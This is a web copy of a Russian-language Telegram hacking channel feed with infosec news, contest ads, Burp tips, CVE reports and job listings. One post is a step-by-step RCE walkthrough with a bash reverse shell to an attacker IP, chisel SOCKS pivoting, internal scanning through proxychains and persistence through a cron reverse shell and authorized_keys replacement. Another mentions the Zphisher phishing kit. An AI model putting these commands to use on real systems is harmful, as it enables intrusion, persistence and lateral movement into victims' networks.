tgoop.com »
United States »
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность » Telegram Web
This media is not supported in your browser
VIEW IN TELEGRAM
Zphisher — автоматизированный фреймворк для фишинга, идеально подходящий для этических тестов безопасности и повышения осведомлённости о социальных атаках.
Что делает:
Фишки, о которых мало кто говорит:
Использование вне разрешённых сценариев — прямой путь к уголовной ответственности. Работайте головой, а не только руками.
*Meta признана экстремистской организацией в РФ
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1🔥1
🔥 IT Breaking Memes — 30 000 ₽ за самую смешную IT-новость
Библиотека программиста запускает конкурс, который взорвет вашу ленту: создайте самую смешную альтернативную версию реальной IT-новости!
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🏆 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
Пример:
Реальная новость: «Гугл создала модель для общения с дельфинами».
Смешная альтернатива: «Нейросеть от Гугл обрабатывает видеопоток с камеры в свинарнике. ИИ следит, сколько свинья находится возле кормушки, не отталкивают ли ее собратья. Недокормленных докармливают, а переевшие пропускают следующую кормешку».
📅 Сроки: с 29 апреля по 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Ждем ваших новостей!
Библиотека программиста запускает конкурс, который взорвет вашу ленту: создайте самую смешную альтернативную версию реальной IT-новости!
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🏆 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
Пример:
Реальная новость: «Гугл создала модель для общения с дельфинами».
Смешная альтернатива: «Нейросеть от Гугл обрабатывает видеопоток с камеры в свинарнике. ИИ следит, сколько свинья находится возле кормушки, не отталкивают ли ее собратья. Недокормленных докармливают, а переевшие пропускают следующую кормешку».
📅 Сроки: с 29 апреля по 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Ждем ваших новостей!
Что делать, если реальных атак немного, но быть к ним готовым нужно на 100%? В Банке «Санкт-Петербург» выбрали путь практики — участие в онлайн-учениях Standoff Defend.
Что получили на выходе:
— Сложные, многослойные сценарии с ложными следами и неожиданными поворотами.
— Реальные подходы хакеров: обход периметра, маскировка под легитимный трафик, работа в стиле APT-группировок.
— Рост уверенности в команде при анализе логов и реагировании на инциденты.
— Понимание, где сильны, а где нужно усилить экспертизу.
Standoff Defend стал для команды не просто тренажёром, а полноценной платформой развития. Это как симулятор полётов для пилота — учит действовать в стрессовых условиях без риска для бизнеса.
«После полигона команда вышла на новый уровень. Это как после тренажёра — ты уже умеешь держать удар».
— Александр Дорофеев, начальник отдела мониторинга и реагирования на инциденты ИБ
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1🔥1
Пентест — это не только найти дыру, но и грамотно донести ее до заказчика или баг-баунти платформы. А составлять отчет — задача неблагодарная: муторно, долго, да ещё и Markdown забывается в самый нужный момент.
Чтобы не тратить время на шаблоны и формулировки, вот промпт, который делает все за вас:
Write a bug bounty report for the following reflected XSS: [вставьте PoC]. Include: Title, VRT, CVSS, Description, Impact, PoC, and recommended Fix. Use Markdown.
Что получаем на выходе:
Можно использовать не только для XSS, но и для SQLi, IDOR, CSRF и других находок — просто адаптируй PoC и вуаля.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔6❤1👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7❤1
Это один из самых тревожных и, увы, до сих пор реальных сценариев: ты нашёл базу данных и хочешь понять, насколько безответственно там обращаются с паролями. Вот как быстро это проверить.
Шаги:
Если ты на этапе баг-баунти — это может быть через SQL-инъекцию или доступ к резервным копиям. Мы не поощряем взлом — только разрешённое тестирование.
Обычно:
users, accounts, members, login, auth.
123456, admin, qwerty
— это plaintext
. bcrypt, MD5, SHA-1
).Если у всех пользователей одинаковый пароль, но хеши разные — скорее всего, применяется соль. Это хорошо. Если хеши совпадают — соль не используется. Это плохо.
— Не публикуй реальные дампы или пароли — это нарушение этики и закона.
— Не используй полученные данные за пределами согласованных условий пентеста.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2👏2
Тебе говорят:
«Разрешим сотрудникам работать с личных устройств — пусть будет удобно!»
И вот уже backend-инженер пушит в репу с iPad-а, дизайнер гоняет макет с домашнего ноута, а кто-то подключается к корпоративной Wi-Fi с телефона, где стоит TikTok, Telegram, торренты и три анонимных VPN-а.
Плюсы:
Минусы:
Плюсы:
Минусы:
BYOD — это как звать людей на вечеринку с их алкоголем. Да, дешевле. Но кто потом будет разбираться, кто разбил стекло, кто выключил сигнализацию и кто унес с собой флешку с исходниками?
А у вас в компании как? Делитесь практиками в комментах
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3👾2
Ctrl + R
— отправляет текущий запрос из Proxy, HTTP history или Intruder прямо в Repeater.Зачем это нужно:
• Мгновенно переключиться к ручному редактированию запроса.
• Позволяет точно тестировать различные payload’ы и видеть, как сервер реагирует.
• Удобно при исследовании уязвимостей типа IDOR, XSS, SQLi.
Пример сценария:
1. Перехватил запрос в Proxy.
2. Видишь интересный параметр в GET-запросе.
3. Нажал
Ctrl + R
— и он уже в Repeater, где можно экспериментировать с инъекциями.Ctrl + Shift + L
— для отправки всех табов одним кликом, если проверяешь цепочку запросов.#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2❤1
Каждый год хакеры соревнуются не только в CTF и баунти, но и за престиж. Pentest Award — это премия для тех, кто не просто нашёл баг, а сделал это красиво, эффективно и с пользой. Организатор — компания «Авилликс».
В 2025 году номинаций стало больше, и теперь каждый найдёт своё поле боя:
Новые категории:
Сколько стоит и что получите:
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤2👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚3❤1😁1
Это критическая дыра в Cisco IOS XE — прошивке, которую используют маршрутизаторы и коммутаторы.
Что можно после взлома:
• Добавлять/удалять пользователей
• Выполнять команды через CLI
• Полностью управлять устройством
Обновить прошивку. Никаких патчей — только апдейт.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2❤1
Знание их особенностей безопасности становится критически важным для пентестеров. Кроме того, использование Shodan позволяет обнаруживать скрытые ресурсы без доменных имен, расширяя возможности разведки.
Системы, такие как PenTest++, интегрируют генеративный ИИ для оптимизации рабочих процессов, включая разведку, сканирование и эксплуатацию уязвимостей. Это позволяет ускорить рутинные задачи, оставляя больше времени для стратегического анализа.
Пентест в финансовом секторе фокусируется на сложной инфраструктуре и строгих регуляциях. ИИ и автоматические системы помогают быстро выявлять угрозы, а тестирование ИИ-моделей направлено на предотвращение мошенничества.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1😁1
CIA, или триада ЦРУ, — это модель политики ИБ компании.
• конфиденциальность — это перечень нормативов, которые ограничивают доступ к информации компании;
• целостность — гарантия достоверности и точности информации;
• доступность — возможность сотрудникам с правом доступа пользоваться данными.
👍 — если уже знал/а ответ
🌚 — узнал/а новое
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🌚8🔥1
🔥 Конкурс: 30 000 ₽ за самую смешную IT-новость
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Google Docs
Конкурс на самую смешную IT-новость
Библиотека программиста запускает конкурс, который взорвет вашу ленту: создайте самую смешную альтернативную версию реальной IT-новости!
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
👍2🔥2❤1
Middle/Senior Application Security Engineer — от 250 000 ₽, удаленно (Москва)
Инженер по информационной безопасности — от 160 000 ₽, офис (Екатеринбург)
Pentester в RedTeam команду — 150 000 - 300 000 ₽, удаленно (Москва)
Специалист по информационной безопасности — от 157 500 ₽ , офис (Казань)
Information Security Specialist (Middle) — офис (Санкт-Петербург)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥2❤1
Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.
nmap -p 80,443 --script http-vuln* <target_ip>
— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:
curl "http://target.com/test.php?cmd=id"
⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.
Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
—
python3 -c 'import socket,os,...'
—
php -r '...reverse shell...'
— perl, nc -e, curl | sh
— в зависимости от окруженияnc -lvnp 4444
Например, chisel:
# На атакующей машине
chisel server -p 8000 --reverse
# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks
⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)
Настрой файл /etc/proxychains.conf на:
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24
⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.
- cronjob:
* * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1
- systemd:
.service
с автозапуском- загрузка агента
Metasploit
- использование
ssh-keygen
и подмена .ssh/authorized_keys
🧠 Примечания:
• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.
⚠️ Disclaimer:
Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8😁2❤1🔥1
Google выпустила майский патч безопасности Android — устранил 46 уязвимостей, но одна из них уже используется в атаках.
CVE-2025-27363 (CVSS 8.1) — критическая дыра в библиотеке FreeType, позволяет выполнить код без взаимодействия с пользователем. Ошибка устранена в FreeType 2.13.0+.
Обновление от 5 мая устраняет также баги в ядре, фреймворке, GPU PowerVR, ARM Mali, модемах MediaTek и чипах Qualcomm.
Теперь Android — это не только прошивка. Безопасность зависит от Google Play Protect и Project Mainline. Проверьте, актуален ли ваш патч
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2🤩1
Эта команда позволяет мониторить файл аутентификации в режиме реального времени, фильтруя события, связанные с SSH:
tail -f /var/log/auth.log | grep ssh
tail -f
— выводит новые строки по мере их появления.grep ssh
— фильтрует только те строки, которые содержат информацию об SSH. Используется для:
• Отслеживания попыток подключения по SSH.
• Выявления неудачных попыток входа.
• Мониторинга активности пользователей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2😁2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁2🥱2🔥1